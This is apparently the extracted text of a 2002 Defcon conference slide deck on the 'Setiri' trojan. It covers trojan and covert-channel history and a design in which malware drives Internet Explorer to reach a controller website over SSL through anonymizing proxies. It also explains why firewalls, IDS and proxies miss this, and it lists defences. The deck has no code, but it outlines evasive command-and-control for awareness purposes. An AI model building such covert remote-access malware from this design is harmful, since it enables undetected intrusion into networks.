Upload
others
View
3
Download
0
Embed Size (px)
Citation preview
Setiri:
Advances in Trojan Technology
Roelof Temmingh & Haroon Meer
Defcon 10
Las Vegas
2002
Schedule
IntroductionWhy Trojans?
Brief History of Trojans & Covert Channels
The Hybrid modelSetiri: Advances in Trojan Technology
Demonstration
Taking it furtherPossible fixes
Introduction
SensePostThe speakers
Objective of the presentation
Why Trojans?
Profile of Trojan users
Real criminals……don’t write buffer overflows
The weirdness of the industry
Examples
Brief History of Trojans & Covert
Tunnels
TrojansFrom Quick Thinking Greeks …
to Quick Thinking Geeks
TunnelsCovert Channels
Trojans (Valid IP – No Filters)
‚get real..‛
Trojans (Valid IP – Stateless Filter)
Dial Home Trojans
Random Ports / Open Ports / High Ports [cDc]
ACK Tunneling[Arne Vidstrom]
Trojans (Stateful Filters)
Orifice - http://bo2k.sourceforge.netGbotRattler
Brief History of Trojans & Covert
Tunnels
TrojansFrom Quick Thinking Greeks …
to Quick Thinking Geeks
TunnelsCovert Channels
Tunnels & Covert Channels
1985 – TSC Definition‛Covert Channels‛
1996 – Phrack Magazine – LOKI
1998 – RWWWShell – THC
1999 - HTTPTUNNEL – GNU
2000 - FireThru - Firethru
Conventional Trojans & how they fail
Stateful firewall & IDSDirect model
Direct model with network tricksICMP tunnelingACK tunneling
Properly configured stateful firewallIRC agents +
Authentication proxyHTTP tunnel ++
Personal firewall & Advanced ProxyHTTP tunnel with Authentication +++
Hybrid model: “GatSlag”
Combination between covert Tunnel and Trojan
Defenses mechanisms today:
Packet filters (stateful) / NATAuthentication Proxies
Intrusion detection systemsPersonal firewalls
Content/protocol checkingBiometrics/Token Pads/One time passwords
Encryption
A typical network
How GatSlag worked
Reverse connectionHTTP covert tunnel
Microsoft Internet Explorer as transport
Controls IE via OLEEncapsulate in IE, not HTTP
Receive commands in title of web pageReceive encoded data as plain text in body of web page
Send data with POST requestSend alive signals with GET request
Why GatSlag worked
Integration of client with MS ProxyNTLM authentication
SSL capableRegistry changes
Personal firewallsJust another browser
Platform independentIE on every desktop
Specify ControllerVia public web page – the MASTER site
Problems with Gatslag
The Controller’s IP can be obtained !Handling of multiple instances
GUI supportController needed to be online
Batch commandsCommand historyMultiple controllers
Upload facility not efficientPlatform support
Stability
Session level tunneling
Setiri:
Advances in Trojan Technology
Design notes:
Web site contains instructionsCGIs to create new instruction
Controller’s interface:–EXEC (DOS commands, various)
–TX (File upload)–RX (File download)
Directory structure – each instanceTrojan ‚surfs‛ to web site – just a normal user would
Setiri:
Advances in Trojan Technology II
AnonymityProblems with normal proxies
Already using a proxyProxy logs
‚Cleaners‛ provide anonymity‚In browser proxy‛ – Anonymizer
Trojan -> Cleaner: SSLCleaner -> Controller: SSL
Challenges:Browser historyTemporary files
Why defenses failFirewalls (stateful/NAT)
Configured to allow user or proxy out
Content level & IDSLooks like valid HTTP requests & repliesFiles downloaded as text in web pages
No data or ports to lock on toSSL provides encryption
Personal firewallsIE valid application
Configured to allow browsing
Authentication proxiesUser surf the web
Demonstration
Solving the dilemma
Delivery
White listing
User education
AV, personal firewalls
Should you allow everyone to surf the ‘net?
Conclusion
Awareness
Our motivation